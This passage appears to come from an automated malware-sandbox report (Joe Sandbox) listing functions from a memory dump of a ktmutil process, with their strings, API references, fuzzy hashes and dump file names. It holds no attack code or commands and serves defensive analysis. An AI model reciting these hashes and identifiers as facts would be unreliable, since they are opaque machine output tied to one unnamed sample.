                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                • Opcode ID: 2142ab169abd558bf61001a2b23e01dd80fa0c7c1fa0bb99882edf2e010ffeff
                                                • Instruction ID: 19eb94a6dcfaad5961a50b34853ec9bea11cf639650b279bb5845003010ced9c
                                                • Opcode Fuzzy Hash: 2142ab169abd558bf61001a2b23e01dd80fa0c7c1fa0bb99882edf2e010ffeff
                                                • Instruction Fuzzy Hash: 39E1BC30608741DFD725DF28C884B2AB7E1FB88318F244AADF5A58B6E0D774D944CB46
                                                Function 02B8BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Resource at %p, xrefs: 02BC7B8E
                                                • RTL: Re-Waiting, xrefs: 02BC7BAC
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02BC7B7F
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 0-871070163
                                                • Opcode ID: bf31d81933c4d23e9084c5361ca5782c428fd9c500a5f956c6e115762ec5fd40
                                                • Instruction ID: 9e0ba21b1eeb5770bdfdbc8e2fc1b2d68a352b2c43e4cded94b33048e372c342
                                                • Opcode Fuzzy Hash: bf31d81933c4d23e9084c5361ca5782c428fd9c500a5f956c6e115762ec5fd40
                                                • Instruction Fuzzy Hash: 7E41E1357047029FDB21EE25C850B6AB7E5EF88714F100AADF99ADB690DB30E805CF91
                                                Function 02B8B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02BC728C
                                                Strings
                                                • RTL: Resource at %p, xrefs: 02BC72A3
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02BC7294
                                                • RTL: Re-Waiting, xrefs: 02BC72C1
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                • Opcode ID: 40b73c37ae9c2bb42a6c7de6fbed43791124d711f5e46fbf8c0dafeaa466ad8b
                                                • Instruction ID: 479e95e56029d35255fc5371073500c1403dd58b67080d32adde5a8fdac60cef
                                                • Opcode Fuzzy Hash: 40b73c37ae9c2bb42a6c7de6fbed43791124d711f5e46fbf8c0dafeaa466ad8b
                                                • Instruction Fuzzy Hash: 6E411031700206ABDB20DE25CC41B66B7A9FB55714F28069DF999EB240DB20E846DBD1
                                                Function 02C02300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: c3c4d0b936f314d813abbf98ae167039ac3911a76ca856ea15cb9a7b0fa5db59
                                                • Instruction ID: 2866b5c6c81f60cdf082326ec2b5c9e78b8850ba862b7e1145061c785756d955
                                                • Opcode Fuzzy Hash: c3c4d0b936f314d813abbf98ae167039ac3911a76ca856ea15cb9a7b0fa5db59
                                                • Instruction Fuzzy Hash: 37318772A001199FDB20DF29CC94BEEB7FCEB44614F544596ED4DD3140EB30AA449F61
                                                Function 02B97D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction ID: 687116d5ea85b70112f6ed03c2b31388e8ae502e85f30a92bdd6919850b4c199
                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction Fuzzy Hash: 099193F0E102459BDF24DE69C881BBEF7E9EF45724F2446BAE855AB2C0DB309940DB50
                                                Function 02B59126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$@
                                                • API String ID: 0-1194432280
                                                • Opcode ID: 3fb9bf5afcc84b579c1ec4651b99bcd186a4ff6c364566e9d8a586fb35a56149
                                                • Instruction ID: f3f210374947f0fdfe003fa00763941d8c6e0505675b04f5077e23a3b0b73085
                                                • Opcode Fuzzy Hash: 3fb9bf5afcc84b579c1ec4651b99bcd186a4ff6c364566e9d8a586fb35a56149
                                                • Instruction Fuzzy Hash: 0A811AB5D006799BDB219B54CC44BEEB7B8AF08754F0045EAAA19B7240D7709E84CFA0